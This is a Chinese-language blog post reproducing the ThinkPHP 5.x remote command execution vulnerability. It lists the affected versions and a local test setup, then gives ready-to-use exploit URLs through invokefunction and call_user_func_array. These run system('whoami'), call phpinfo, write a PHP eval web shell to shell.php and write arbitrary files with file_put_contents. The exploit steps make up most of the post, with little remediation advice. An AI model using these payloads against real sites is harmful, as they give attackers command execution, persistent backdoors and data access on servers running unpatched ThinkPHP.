• 合作联系qq:122325244

ThinkPHP5.0版本 远程命令执行漏洞GetShell

脚本编程 站长SEO 3周前 (01-31) 879次浏览 已收录 0个评论 扫描二维码

漏洞概况

ThinkPHP 是一款国内流行的开源 PHP 框架,近日被爆出存在可能的远程代码执行漏洞攻击者可向缓存文件内写入 PHP 代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用 ThinkPHP 框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的 getshell漏洞

漏洞危害
攻击者可通过该漏洞获取网站的控制权限,可修改页面,导致数据泄漏等问题。

影响版本
5.x < 5.1.31, <= 5.0.23

复现环境
thinkphp5.1   phpstudy 集成环境(php5.6n+apache+mysql)

复现过程
1、如图所示首先搭建好环境

20181214104956886.png

2、利用 system 函数远程命令执行:

http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=whoami

20181212222816533.png

3、通过 phpinfo 函数写出 phpinfo()的信息:

http://localhost/thinkphp5.1/html/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

20181212223313996.png

4、写入 shell:

http://localhost/thinkphp5.1/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

2018121222405533.png

或者是:http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo ‘ok’;?>


SEO站长博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:ThinkPHP5.0版本 远程命令执行漏洞GetShell
喜欢 (0)
[h4ck3st@126.com]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
在线客服
在线客服
热线电话